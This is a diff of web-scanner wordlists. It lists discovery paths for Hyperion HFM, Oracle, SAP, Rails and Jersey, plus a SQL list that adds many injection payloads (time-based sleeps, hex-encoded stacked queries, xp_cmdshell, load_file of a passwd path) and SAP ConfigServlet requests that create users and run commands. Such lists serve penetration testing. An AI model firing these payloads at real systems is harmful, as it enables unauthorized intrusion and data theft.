-HFM/LoadExtract/ProcessLoadJournals.asp
-HFM/LoadExtract/ProcessLoadMemberLists.asp
-HFM/LoadExtract/ProcessLoadRules.asp
-HFM/LoadExtract/ProcessLoadSecurity.asp
-HFM/LoadExtract/ProcessLoadTransactions.asp
-HFM/LoadExtract/ProcessTransactionsExtractTree.asp
-HFM/LoadExtract/downloadictlog.asp
-HFM/LoadExtract/loaddata.asp
-HFM/LoadExtract/loadmeta.asp
-HFM/LoadExtract/loadmeta_options.asp
-HFM/LoadExtract/processExtractTransactions.asp
-HFM/Logon
-HFM/Logon/AuthenticateUser.asp
-HFM/Logon/Logoff.asp
-HFM/Logon/ProcessLogoff.asp
-HFM/Logon/ProcessLogon.asp
-HFM/Logon/SSO.asp
-HFM/MbrSel
-HFM/MbrSel/MbrSel.asp
-HFM/MbrSel/MbrSelXml.asp
-HFM/MbrSel/MbrSel_Include.asp
-HFM/MbrSel/MbrSel_Test.asp
-HFM/OpenApp
-HFM/OpenApp/CloseApp.asp
-HFM/OpenApp/CloseApplication.asp
-HFM/OpenApp/DisplayServers.asp
-HFM/OpenApp/HsvJSConstantsServer_OpenApp.asp
-HFM/OpenApp/OpenAppDirect.asp
-HFM/OpenApp/ReopenAppDirect.asp
-HFM/OpenApp/SelectApp.asp
-HFM/OpenApp/SelectServer.asp
-HFM/OpenApp/ServerStatus.asp
-HFM/OpenApp/StartPage.asp
-HFM/OpenApp/appopen.asp
-HFM/OwnershipManagement
-HFM/OwnershipManagement/DisplayColumns.asp
-HFM/OwnershipManagement/EPU.xsl
-HFM/OwnershipManagement/EPUFilterOptions.asp
-HFM/OwnershipManagement/EPUReport.asp
-HFM/OwnershipManagement/EPU_Report.xsl
-HFM/OwnershipManagement/ManageEPU.asp
-HFM/OwnershipManagement/OwnershipManagement.asp
-HFM/OwnershipManagement/ProcessCalcEPU.asp
-HFM/OwnershipManagement/ProcessSharesCalculation.asp
-HFM/OwnershipManagement/SharesCalculation.asp
-HFM/POV
-HFM/POV/POVCommon.asp
-HFM/POV/POVRequestData.asp
-HFM/POV/povfinishpage.asp
-HFM/POV/povstartpage.asp
-HFM/ProcessManagement
-HFM/ProcessManagement/ProcessFlowHistory.asp
-HFM/ProcessManagement/ProcessFlowManagement.asp
-HFM/ProcessManagement/ProcessFlowValidationDetail.asp
-HFM/ProcessManagement/ProcessManagement.asp
-HFM/ProcessManagement/ProcessManagementSummary.asp
-HFM/Reports
-HFM/Reports/AddICPAccount.asp
-HFM/Reports/DynamicICP.asp
-HFM/Reports/EditReport.asp
-HFM/Reports/HsvJSConstantsServer_Reports.asp
-HFM/Reports/ICPCommon.asp
-HFM/Reports/ICPReportBuilder.asp
-HFM/Reports/ICPReports.asp
-HFM/Reports/OpenLocalReports.asp
-HFM/Reports/OpenRemoteReport.asp
-HFM/Reports/OpenRemoteReports.asp
-HFM/Reports/PrintJournalReportOverride.asp
-HFM/Reports/PrintReports.asp
-HFM/Reports/ProcessICPGetEntity.asp
-HFM/Reports/ProcessICPPOV.asp
-HFM/Reports/ProcessICPReports.asp
-HFM/Reports/ProcessJournalReports.asp
-HFM/Reports/ProcessJournalReportsPov.asp
-HFM/Reports/ProcessOpenLocalReports.asp
-HFM/Reports/ReportFormatOptions.asp
-HFM/Reports/SaveJournalReportLocal.asp
-HFM/Reports/SaveLocal.asp
-HFM/Reports/checkStatus.asp
-HFM/Security
-HFM/Security/GetClasses.asp
-HFM/Security/GetUsers.asp
-HFM/Security/TestSecurityHarness.asp
-HFM/Security/bpm
-HFM/Security/bpm/BpmLauncher.asp
-HFM/Security/bpm/BpmLauncher.xml
-HFM/Security/bpm/BpmUi_Version.xml
-HFM/Security/bpm/asp
-HFM/Security/bpm/asp/tree.asp
-HFM/Security/bpm/conf
-HFM/Security/bpm/conf/BpmContextConfig.xml
-HFM/Security/bpm/conf/BpmContextConfig.xsd
-HFM/Security/bpm/conf/BpmDebugConfig.xml
-HFM/Security/bpm/conf/BpmReleaseConfig.xml
-HFM/Security/bpm/conf/HfmConfig.xml
-HFM/Security/bpm/launcher.asp
-HFM/Security/bpm/modules
-HFM/Security/bpm/modules/com
-HFM/Security/bpm/modules/com/hyperion
-HFM/Security/bpm/modules/com/hyperion/bpm
-HFM/Security/bpm/modules/com/hyperion/bpm/web
-HFM/Security/bpm/modules/com/hyperion/bpm/web/containers
-HFM/Security/bpm/modules/com/hyperion/bpm/web/containers/wizard
-HFM/Security/bpm/modules/com/hyperion/bpm/web/containers/wizard/Adf.asp
-HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop
-HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/Adf.asp
-HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/header
-HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/header/header.inc
-HFM/Security/bpm/modules/com/hyperion/hfm
-HFM/Security/bpm/modules/com/hyperion/hfm/web
-HFM/Security/bpm/modules/com/hyperion/hfm/web/appcontainer
-HFM/Security/bpm/modules/com/hyperion/hfm/web/appcontainer/Adf.asp
-HFM/Security/bpm/modules/com/hyperion/hfm/web/prefs
-HFM/Security/bpm/modules/com/hyperion/hfm/web/prefs/Adf.asp
-HFM/Security/bpm/resources
-HFM/Security/conf
-HFM/Security/conf/HfmConfig.xml
-HFM/Security/createSecurityClass.asp
-HFM/Security/deleteSecurityClass.asp
-HFM/Security/getRights.asp
-HFM/Security/getRightsAndRoles.asp
-HFM/Security/getRoles.asp
-HFM/Security/getUsersInGroup.asp
-HFM/Security/modules
-HFM/Security/modules/com
-HFM/Security/modules/com/hyperion
-HFM/Security/modules/com/hyperion/hfm
-HFM/Security/modules/com/hyperion/hfm/web
-HFM/Security/modules/com/hyperion/hfm/web/security
-HFM/Security/modules/com/hyperion/hfm/web/security/appnode
-HFM/Security/modules/com/hyperion/hfm/web/security/appnode/Adf.asp
-HFM/Security/modules/com/hyperion/hfm/web/security/assign
-HFM/Security/modules/com/hyperion/hfm/web/security/assign/Adf.asp
-HFM/Security/modules/com/hyperion/hfm/web/security/assign/AssignRights.xsl
-HFM/Security/modules/com/hyperion/hfm/web/security/assign/DataSet.xml
-HFM/Security/modules/com/hyperion/hfm/web/security/assign/DataSet.xsd
-HFM/Security/modules/com/hyperion/hfm/web/security/classes
-HFM/Security/modules/com/hyperion/hfm/web/security/classes/Adf.asp
-HFM/Security/modules/com/hyperion/hfm/web/security/classes/Classes.xsd
-HFM/Security/modules/com/hyperion/hfm/web/security/report
-HFM/Security/modules/com/hyperion/hfm/web/security/report/Adf.asp
-HFM/Security/modules/com/hyperion/hfm/web/security/report/UserGroupCSV.xsl
-HFM/Security/modules/com/hyperion/hfm/web/security/report/UserGroupHTML.xsl
-HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRightsAndRolesCSV.xsl
-HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRightsAndRolesHTML.xsl
-HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRightsCSV.xsl
-HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRightsHTML.xsl
-HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRolesCSV.xsl
-HFM/Security/modules/com/hyperion/hfm/web/security/report/UserRolesHTML.xsl
-HFM/Security/modules/com/hyperion/hfm/web/security/users
-HFM/Security/modules/com/hyperion/hfm/web/security/users/Adf.asp
-HFM/Security/modules/com/hyperion/hfm/web/security/users/Users.xsd
-HFM/Security/olapsample.csv
-HFM/Security/saveAsCsv.asp
-HFM/Security/saveRights.asp
-HFM/Security/securityAssignmentWizard.asp
-HFM/Security/setSelectedClasses.asp
-HFM/Security/setSelectedUsers.asp
-HFM/ThirdParty
-HFM/ThirdParty/Bindows
-HFM/ThirdParty/Bindows/html
-HFM/ThirdParty/Bindows/html/BiWsdlBuiltinTypes.xsd
-HFM/ThirdParty/Bindows/html/bimain.html
-HFM/ThirdParty/Bindows/html/blank.html
-HFM/Workspace
-HFM/Workspace/EmptyWorkspace.asp
-HFM/Workspace/Preferences.asp
-HFM/Workspace/Workspace.asp
-HFM/Workspace/WorkspaceCommon.asp
-HFM/Workspace/WorkspaceFlow.asp
-HFM/default.asp
-HFM/favicon.ico
-HFM/global.asa
--- a/wordlists/vulnerabilities/iplanet.txt
+++ b/wordlists/vulnerabilities/iplanet.txt
@@ -14,7 +14,6 @@ admpw
 agents
 bin
 ca
-ca
 cgi-bin
 config
 dirb_random.cgi
--- a/wordlists/vulnerabilities/jersey.txt
+++ b/wordlists/vulnerabilities/jersey.txt
@@ -1,121 +0,0 @@
-JAXBElement
-SimpleServlet/resources/start
-XmlRootElement
-XmlType
-aircrafts
-application.wadl
-assembly.xml
-atom/application.wadl
-atom/collection
-atompub-contacts-client
-atompub-contacts-models
-atompub-contacts-server
-bookmark
-bookmark-em
-bookmarks
-bookstore
-changes
-changes/latest
-collection
-contacts
-containers
-count
-data
-ejb
-emptyArrayResource
-entity-provider
-extended-wadl-webapp
-extended-wadl-webapp/application.wadl
-flights
-form
-form/colours
-generate-wadl
-groovy
-helloworld
-helloworld-webapp
-helloworld-webapp/helloworld 
-https-clientserver-grizzly
-https-server-glassfish
-httpsBasicAuth-webapp/helloworld
-item
-item/content
-item/content/1
-jacksonjsonprovider
-jacksonjsonprovider/application.wadl
-jacksonjsonprovider/emptyArrayResource
-jacksonjsonprovider/nonJAXBResource
-jaxb
-jaxb/JAXBElement
-jaxb/XmlRootElement
-jaxb/XmlType
-jaxb/array/XmlRootElement
-jaxb/array/XmlType 
-jaxb/collection/XmlRootElement
-jaxb/collection/XmlType
-jcdi-beans-webapp
-jcdi-beans-webapp/ejb/stateless
-jcdi-beans-webapp/jcdibean/dependent/per-request
-jcdi-beans-webapp/jcdibean/dependent/singleton
-jcdi-beans-webapp/jcdibean/per-request
-jcdi-beans-webapp/jcdibean/singleton
-jcdibean
-jersey-autowired 
-jersey-ejb
-jersey-ejb/app/messages
-jersey-ejb/app/messages/1
-jmaki-backend
-json-from-jaxb
-jsonfromjaxb/aircrafts
-jsonfromjaxb/application.wadl
-jsonfromjaxb/flights
-jsonp
-jsonp/changes
-managed-beans-webapp
-mandel
-mandelbrot
-markup
-nonJAXBResource
-occ/item
-occ/item/content/0
-optimistic-concurrency
-per-request
-pom.xml
-printers
-printers/ids/1
-printers/jMakiTable 
-printers/jMakiTree
-printers/list
-properties
-resources/application.wadl
-resources/form
-resources/form/colours
-resources/start
-scala-helloworld-webapp
-service
-simple-atom-server
-simple-console
-simple-servlet
-singleton
-sparklines
-sparklines/discrete
-spring-annotations
-spring-aop
-spring-aop/subresource
-spring-autowired
-spring-resourced
-spring/jersey-autowired 
-spring/spring-aop 
-spring/spring-aop/subresource 
-spring/spring-autowired 
-spring/spring-resourced 
-start
-stateless
-storage-service
-storage/containers
-storage/containers/quotes
-time
-users
-users/
-users/1
-users/1/bookmarks
-users/1/bookmarks/1
--- a/wordlists/vulnerabilities/juicy_files.txt
+++ b/wordlists/vulnerabilities/juicy_files.txt
--- a/wordlists/vulnerabilities/oracle.txt
+++ b/wordlists/vulnerabilities/oracle.txt
@@ -40,15 +40,12 @@ JSP
 NFIntro.htm
 OA_HTML/
 OA_HTML/AppsLocalLogin.jsp
-OA_HTML/PTB/mwa_readme.htm
-OA_HTML/oam/weboam.log
-OA_JAVA/
+OA_HTML/ibeCAcpSSOReg.jsp
 OHW
 OnlineOrders_html/
 OnlineOrders_html/login.jsp
 Oracle
 OracleASjms
-README
 RedirectServlet
 RequestHeaderExample
 RequestInfoExample
@@ -65,12 +62,12 @@ ToJSPServlet
 ViewSrc
 WEB-INF/config.xml
 WebCacheDemo.html
-XSQLConfig.xml
+[
+]
 _pages
 _pages/
 _pages/_demo/
 _pages/_demo/_ojspext/_events/_index.java
-_pages/_demo/_sql/
 _pages/_demo/_sql/_pages/
 _pages/_webapp/_admin/_showjavartdetails.java
 _pages/_webapp/_admin/_showpooldetails.java
@@ -79,7 +76,6 @@ admin/
 admin_/
 admin_ejb
 adminoc4j
-apex/
 aplogon.html
 appdet.html
 aqserv/servlet
@@ -226,7 +222,6 @@ demo/xml/helloxml/index.html
 demo/xml/index.html
 demo/xml/xmlquery/XMLQuery.jsp
 demo/xml/xmlquery/index.html
-demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
 dev60cgi/f60cgi
 dev60cgi/ifcgi60.exe
 dev60cgi/rwcgi60
@@ -324,7 +319,6 @@ inventory/
 isqlplus
 isqlplus/
 j2ee
-j2ee/
 j2ee/OC4J_Demos
 j2ee/examples/jsp/
 j2ee/examples/jsp/cal/calendar.html
@@ -405,7 +399,6 @@ logs
 master/
 mesg/
 mod_ose.html
-mod_ose_docs
 mod_ose_docs/
 myapp
 myapp/
@@ -421,7 +414,6 @@ oas
 oc4j
 oc4j-status
 oc4jadmin
-oem_webstage/oem.conf
 oiddas
 oiddas/
 oiddas/oiddashome.uix
@@ -694,8 +686,6 @@ onlineorders_html/
 oprocmgr-service
 oprocmgr-status
 oracle
-oracle/
-oradata/
 orasso
 orasso/
 orasso/orasso.home
@@ -738,7 +728,6 @@ ows-bin/owa
 ows-bin/owa/admin_/
 ows-bin/ows-binqlapp
 ows-bin/ows-binqlapp/admin_/
-ows-bin/perlidlc.bat?&di
 ows-bin/portal
 ows-bin/portal2
 ows-bin/portal2/admin_/
@@ -771,7 +760,6 @@ petstore
 pls
 pls/
 pls/Workflow/wfa_html.home
-pls/admin
 pls/admin_/gateway.htm
 pls/admin_/globalsettings.htm
 pls/admin_/help/..%255Cplsql.conf
@@ -792,7 +780,6 @@ pls/help/
 pls/htmldb
 pls/htmldb/apex_admin
 pls/htmldb/htmldb
-pls/ldc/admin_/
 pls/myapp
 pls/myapp/admin_/
 pls/mydad
@@ -815,7 +802,6 @@ pls/portal309/admin_/
 pls/portal/admin_/
 pls/portal/null
 pls/portal/owa_util.cellsprint
-pls/portal/owa_util.cellsprint?p_theQuery=select
 pls/portal/owa_util.listprint
 pls/portal/owa_util.show_query_columns
 pls/portal/owa_util.showsoucre
@@ -829,12 +815,8 @@ pls/register/account.welcome
 pls/register/reg.signup
 pls/sample
 pls/sample/admin_/
-pls/sample/admin_/help/..%255cplsql.conf
 pls/simpledad
 pls/simpledad/admin_/
-pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
-pls/simpledad/admin_/gateway.htm?schema=sample
-pls/simpledad/admin_/globalsettings.htm
 pls/ssodad
 pls/ssodad/admin_/
 pls/test
@@ -872,32 +854,15 @@ repdemo/runJSPIAS.html
 repdemo/runrepIAS.html
 reports/examples/Tools/test.jsp
 reports/rwservlet
-reports/rwservlet 
 reports/rwservlet/delauth
 reports/rwservlet/getserverinfo
-reports/rwservlet/getserverinfo 
-reports/rwservlet/help?command=delauth
-reports/rwservlet/help?command=getjobid
-reports/rwservlet/help?command=getserverinfo
-reports/rwservlet/help?command=help
-reports/rwservlet/help?command=killengine
-reports/rwservlet/help?command=killjobid
-reports/rwservlet/help?command=parsequery
-reports/rwservlet/help?command=showauth
-reports/rwservlet/help?command=showenv
-reports/rwservlet/help?command=showjobid
-reports/rwservlet/help?command=showjobs
-reports/rwservlet/help?command=showmyjobs
 reports/rwservlet/killengine
 reports/rwservlet/killjobid
 reports/rwservlet/parsequery
 reports/rwservlet/showauth
 reports/rwservlet/showenv
-reports/rwservlet/showjobid
 reports/rwservlet/showjobs
 reports/rwservlet/showmap
-reports/rwservlet/showmyjobs
-reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
 richtextportlet/info
 root.sh
 ruleauthor
@@ -953,12 +918,10 @@ soap/admin/servicemanager
 soap/admin/servlet/soaprouter
 soap/servlet/Spy
 soap/servlet/soaprouter
-soapConfig.xml
 soapbuilder/
 soapbuilder/r2/InteropTest
 soapdocs/
 soapdocs/ReleaseNotes.html
-soapdocs/webapps/soap/
 soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
 sqlj
 sqlj/
@@ -1058,7 +1021,6 @@ xsql/airport/airport.xsql
 xsql/airport/airportSoap.html
 xsql/classerr/invalidclasses.xsql
 xsql/demo/adhocsql/query.xsql
-xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
 xsql/demo/airport/airport.xsql
 xsql/document/docdemo.html
 xsql/doyouxml/doyouxml.xsql
--- a/wordlists/vulnerabilities/ror.txt
+++ b/wordlists/vulnerabilities/ror.txt
@@ -1,5 +1,6 @@
 .gitignore
 Gemfile
+Gemfile.lock
 README
 README.rdoc
 Rakefile
@@ -26,7 +27,10 @@ assets/jquery.js
 config
 config.ru
 config/application.rb
+config/application.yml
 config/boot.rb
+config/cable.yml
+config/database-example.yml
 config/database.yml
 config/deploy.rb
 config/environment.rb
@@ -34,6 +38,7 @@ config/environments
 config/environments/development.rb
 config/environments/production.rb
 config/environments/test.rb
+config/graphql.js
 config/initializers
 config/initializers/backtrace_silencers.rb
 config/initializers/inflections.rb
@@ -43,7 +48,19 @@ config/initializers/session_store.rb
 config/initializers/wrap_parameters.rb
 config/locales
 config/locales/en.yml
+config/mongoid-example.yml
+config/mongoid.yml
+config/puma.rb
 config/routes.rb
+config/secrets.yml
+config/sidekiq-example.yml
+config/sidekiq.yml
+config/spring.rb
+config/storage.yml
+config/vue.js
+config/webpacker-example.yml
+config/webpacker.yml
+config/yetting.yml
 core
 create
 db
@@ -113,6 +130,9 @@ test/unit
 test/unit/.gitkeep
 tmp/cache
 tmp/cache/assets
+user/sign_in.html
+user/sign_in.json
+user/sign_in.xml
 vendor/assets/javascripts
 vendor/assets/javascripts/.gitkeep
 vendor/assets/stylesheets
--- a/wordlists/vulnerabilities/sap.txt
+++ b/wordlists/vulnerabilities/sap.txt
@@ -2,7 +2,6 @@
 ADS-EJB
 ADS-License
 AE/index.jsp
-AdapterFramework/version/version.jsp
 Adobe
 AdobeDocumentServices/Config
 AdobeDocumentServices/Config?wsdl
@@ -17,7 +16,6 @@ CAFDataService/Config
 CAFDataService/Config?wsdl
 CMSRTS/Config1
 CMSRTS/Config1?wsdl
-CPACache/refresh?mode=full
 DataArchivingService
 GRMGHeartBeat
 GRMGWSTest/service
@@ -73,8 +71,6 @@ VC
 WSConnector/Config1
 WSConnector/Config1?wsdl
 WSConnector/Config2
-XIAxisAdapter/MessageServlet
-XISOAPAdapter/MessageServlet?channel=:INTEGRATION_SERVER_
 _default
 apidocs/
 apidocs/allclasses-frame.html
@@ -96,8 +92,8 @@ caf
 ccsui
 com~tc~lm~webadmin~httpprovider~web
 ctc
-ctc/ConfigTool
-ctc/servlet
+ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
+ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
 dispatcher
 dswsbobje
 dtr_lite
@@ -108,14 +104,12 @@ examples.html
 examples/
 examples_frame.html
 exchangeProfile
-exchangeProfile 
 exchangeProfile/
 guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
 htmlb
 htmlb/
 htmlb/index.html
 index.html
-infoviewapp
 inspection.wsil
 ipcpricing/ui/
 irj
@@ -171,16 +165,13 @@ modeller/index.html
 monitoring
 monitoringProvierRoot
 nwa
-nwa
 performanceProvierRoot
 pmi
 portal
 portalapps
-rep
 rep/build_info.html
 rep/build_info.jsp
 rep/start/index.jsp
-rep/start/index.jsp
 run/build_info.html
 run/build_info.jsp
 rwb/version.html
@@ -190,9 +181,9 @@ samlssodemo_source
 sap
 sap/
 sap/IStest
-sap/XI/engine/?type=entry
 sap/admin
 sap/admin/default.html
+sap/admin/index.html
 sap/ap
 sap/bc
 sap/bc/
@@ -214,9 +205,9 @@ sap/bc/bsp
 sap/bc/bsp/
 sap/bc/bsp/esh_os_service/favicon.gif
 sap/bc/bsp/sap
+sap/bc/bsp/sap
 sap/bc/bsp/sap/
 sap/bc/bsp/sap/SXSLT_DEMO
-sap/bc/bsp/sap/WebServiceBrowser/search.html
 sap/bc/bsp/sap/absenceform_new
 sap/bc/bsp/sap/alertinbox
 sap/bc/bsp/sap/alertinboxwap
@@ -387,6 +378,7 @@ sap/bc/bsp/sap/sxidemo_agcy_ui
 sap/bc/bsp/sap/sxms_alertrules
 sap/bc/bsp/sap/sxslt_training
 sap/bc/bsp/sap/system
+sap/bc/bsp/sap/system
 sap/bc/bsp/sap/system640
 sap/bc/bsp/sap/system_priv_01
 sap/bc/bsp/sap/system_priv_02
@@ -394,7 +386,6 @@ sap/bc/bsp/sap/system_priv_03
 sap/bc/bsp/sap/system_private
 sap/bc/bsp/sap/system_public
 sap/bc/bsp/sap/system_test
-sap/bc/bsp/sap/system                                    
 sap/bc/bsp/sap/t_sam_demo
 sap/bc/bsp/sap/thtmlb_scripts
 sap/bc/bsp/sap/thtmlb_styles
@@ -425,7 +416,6 @@ sap/bc/bsp/sap/wsi_oci_bsp_mvc
 sap/bc/bsp/sap/xi_pf_perf_moni
 sap/bc/bsp/sap/xi_pf_test
 sap/bc/bsp/sap/xmb_bsp_log
-sap/bc/bsp/sap                                            
 sap/bc/bsp/scmb
 sap/bc/bsp/scmb/df_web2
 sap/bc/bsp_dev
@@ -580,7 +570,6 @@ sap/bc/soap/wsdl
 sap/bc/soap/wsdl11
 sap/bc/soap/wsdlservices
 sap/bc/spi_gate
-sap/bc/spi_gate
 sap/bc/srm
 sap/bc/srm/rcm_webdav
 sap/bc/srm/rcm_webdav/
@@ -942,11 +931,11 @@ sap/monitoring
 sap/monitoring/
 sap/monitoring/ComponentInfo
 sap/monitoring/SystemInfo
-sap/monitoring/SystemInfo
 sap/option
 sap/public
 sap/public/
 sap/public/bc
+sap/public/bc
 sap/public/bc/
 sap/public/bc/NWDEMO_MODEL
 sap/public/bc/NW_ESH_TST_AUTO
@@ -979,13 +968,14 @@ sap/public/bc/webdynpro/viewdesigner
 sap/public/bc/webicons
 sap/public/bc/workflow
 sap/public/bc/workflow/shortcut
-sap/public/bc                                                                    
 sap/public/bsp
 sap/public/bsp/sap
+sap/public/bsp/sap
 sap/public/bsp/sap/
 sap/public/bsp/sap/htmlb
 sap/public/bsp/sap/htmlb
 sap/public/bsp/sap/public
+sap/public/bsp/sap/public
 sap/public/bsp/sap/public/
 sap/public/bsp/sap/public/ISE
 sap/public/bsp/sap/public/bc
@@ -995,11 +985,9 @@ sap/public/bsp/sap/public/graphics
 sap/public/bsp/sap/public/graphics/
 sap/public/bsp/sap/public/graphics/jnet_handler
 sap/public/bsp/sap/public/graphics/mimes
-sap/public/bsp/sap/public                                                              
+sap/public/bsp/sap/system
 sap/public/bsp/sap/system
 sap/public/bsp/sap/system_public
-sap/public/bsp/sap                                       
-sap/public/bsp/sap/system                                
 sap/public/bsp/sap/system_public
 sap/public/icf_check
 sap/public/icf_info
@@ -1032,7 +1020,6 @@ sap/xi/cache_ssl
 sap/xi/docu_apperror
 sap/xi/docu_syserror
 sap/xi/engine
-sap/xi/engine/?type=receiver
 sap/xi/engine_test
 sap/xi/simulation
 sap/xml/
@@ -1108,4 +1095,3 @@ wsnavigator/jsps/test.jsp
 wssproc/cert
 wssproc/plain
 wssproc/ssl
-xi/SFIHCM01
--- a/wordlists/vulnerabilities/sql.txt
+++ b/wordlists/vulnerabilities/sql.txt
@@ -1,34 +1,67 @@
-
+0
 0 or 1=1
+0x730065006c0065006300740020004000400076006500 ...
+0x77616974666F722064656C61792027303A303A313027 ...
+0x770061006900740066006F0072002000640065006C00 ...
+1 or 1=1
+1 or benchmark(10000000,MD5(1))#
+1 or pg_sleep(__TIME__)--
+1 or sleep(__TIME__)#
+1 waitfor delay '0:0:10'--
+1)) or benchmark(10000000,MD5(1))#
+1)) or pg_sleep(__TIME__)--
+1)) or sleep(__TIME__)#
+1) or benchmark(10000000,MD5(1))#
+1) or pg_sleep(__TIME__)--
+1) or sleep(__TIME__)#
+1;(load_file(char(47,101,116,99,47,112,97,115, ...
 1;SELECT%20*
+3.10E+17
+21 %
+23 OR 1=1
+26 %
+28 %
+29 %
 !
-"
-"%20or%20"x"="x
-"' or 1 --'"
-") or ("a"="a
-" or 0=0 #
+"));waitfor delay '0:0:__TIME__'--
+")) or benchmark(10000000,MD5(1))#
+")) or pg_sleep(__TIME__)--
+")) or sleep(__TIME__)="
+");waitfor delay '0:0:__TIME__'--
+") or benchmark(10000000,MD5(1))#
+") or pg_sleep(__TIME__)--
+") or sleep(__TIME__)="
+";waitfor delay '0:0:__TIME__'--
+"a"" or 1=1--"
+"a"" or 3=3--"
+"hi"") or (""a""=""a"
 " or 0=0 --
-" or 1=1 or ""="
 " or 1=1--
 " or "a"="a
-#
+" or benchmark(10000000,MD5(1))#
+" or isNULL(1/0) /*
+" or pg_sleep(__TIME__)--
+" or sleep(__TIME__)#
+# from wapiti
 %2A%7C
 %2A%28%7C%28mail%3D%2A%29%29
 %2A%28%7C%28objectclass%3D%2A%29%29
 %7C
 %20$(sleep%2050)
 %20'sleep%2050'
+%20or%20''='
+%20or%20'x'='x
+%20or%20x=x
+%20or%201=1
 %21
 %26
 %27%20or%201=1
 %28
 %29
+%C0%80%27%C0%80%C0%80%C0%80O%C0%82R%C0%80%C0%801%C0%80%C0%A11
 &
 &apos;%20OR
-&lt;&gt;&quot;'%;)(&amp;+
 '
-'%20--
-'%20;
 '%20or%20''='
 '%20or%20'x'='x
 '%20or%201=1
@@ -36,16 +69,18 @@
 ')%20or%20('x'='x
 ') or ('a'='a
 '; exec master..xp_cmdshell
+'; exec master..xp_cmdshell 'ping 172.10.1.255'--
 '; exec xp_regread
 ' UNION ALL SELECT
 ' UNION SELECT
 'hi' or 'x'='x';
 ' or 0=0 #
 ' or 0=0 --
-' or 1=1 or ''='
+' or 1 --'
+' or 1=1
 ' or 1=1 or ''='
 ' or 1=1--
-'or%20select *
+' or 3=3
 ' or '1'='1'--
 ' or ''='
 ' or (EXISTS)
@@ -58,110 +93,176 @@
 'sqlattempt1
 '||UTL_HTTP.REQUEST
 (
+ (select top 1
 (sqlattempt2)
+(sqlvuln)
+(||6)
 )
+)%20or%20('x'='x
+));waitfor delay '0:0:__TIME__'--
+)) or benchmark(10000000,MD5(1))#
+)) or pg_sleep(__TIME__)--
+)) or sleep(__TIME__)='
+);waitfor delay '0:0:__TIME__'--
+) or ('a'='a
+) or (a=a
+) or benchmark(10000000,MD5(1))#
+) or pg_sleep(__TIME__)--
+) or sleep(__TIME__)='
+) union select * from information_schema.tables;
 *(|(mail=*))
 *(|(objectclass=*))
 */*
 *|
+sqlvuln
 ,@variable
-
--
--';
+ --
+ -- &password=
 --sp_password
 /
+/**/or/**/1/**/=/**/1
 //
 //*
+; begin declare @var varchar(8000) set @var=' ...
+; exec ('sel' + 'ect us' + 'er')
+; exec master..xp_cmdshell
+; exec master..xp_cmdshell 'ping 172.10.1.255'--
+; execute immediate 'sel' || 'ect us' || 'er'
+; exec xp_regread
+; or '1'='1'
+;waitfor delay '0:0:__TIME__'--
 <>"'%;)(&+
-=%20'
-=%20--
-=%20;
+?
@variable
+@var select @var as var into temp end --
 PRINT
 PRINT @@variable
-\x3D%20\x3B'
-\x3D%20\x27
-\x23
-\x27
+ UNION ALL SELECT
+ UNION SELECT
 \x27UNION SELECT
-\x27\x4F\x52 SELECT *
-\x27\x6F\x72 SELECT *
-admin'--
+a'
+a' or 1=1--
+a' or 3=3--
+a' or 'a' = 'a
+a' waitfor delay '0:0:10'--
+admin' or '
+ and 1 in (select var from temp)--
+ and 1=( if((load_file(char(110,46,101,120,11 ...
+anything' OR 'x'='x
 as
 asc
+benchmark(10000000,MD5(1))#
 bfilename
 char%4039%41%2b%40SELECT
+declare @q nvarchar (200) 0x730065006c00650063 ...
+declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
+declare @q nvarchar (200) select @q = 0x770061 ...
+declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
+declare @q nvarchar (4000) select @q =
+declare @s varchar(22) select @s =
+declare @s varchar (200) select @s = 0x73656c6 ...
+declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
+declare @s varchar(200) select @s = 0x77616974 ...
+declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
+declare @s varchar (8000) select @s = 0x73656c ...
 delete
 desc
 distinct
+exec(@s)
 exec sp
 exec xp
+ group by userid having 1=1--
 handler
 having
-hi") or ("a"="a
-hi" or 1=1 --
-hi" or "a"="a
+ having 1=1--
 hi') or ('a'='a
 hi' or 1=1 --
 hi' or 'a'='a
+hi' or 'x'='x';
+hi or 1=1 --"
+hi or a=a
 insert
 like
 limit
 or
 or 0=0 #
+ or 0=0 #
+or 0=0 #"
+ or 0=0 #"
 or 0=0 --
+ or 0=0 --
+ or 1 --'
+ or 1 in (select @@version)--
+ or 1/*
+or 1=1
+ or 1=1
+ or 1=1 --
+ or 1=1 /*
+or 1=1 or ""=
+ or 1=1 or ""=
+ or 1=1 or ''='
 or 1=1--
+ or 1=1--
+ or 2 > 1
+ or 2 between 1 and 3
+ or 3=3
+ or 3=3 --
 or%201=1
 or%201=1 --
+ or '1'='1
+ or '1'='1'--
+ or '7659'='7659
+ or ''='
+ or 'a'='a
+ or 'something' = 'some'+'thing'
+ or 'text' = n'text'
+ or 'text' > 't'
+ or 'unusual' = 'unusual'
+ or 'whatever' in ('whatever')
+ or (EXISTS)
+or a=a
+ or a=a
+or a = a
+ or a=a--
+ or a = a
+ or benchmark(10000000,MD5(1))#
 order by
+or isNULL(1/0) /*
+ or pg_sleep(__TIME__)--
+ or sleep(__TIME__)#
+ or sleep(__TIME__)='
+ or username like char(37);
+password:*/=1--
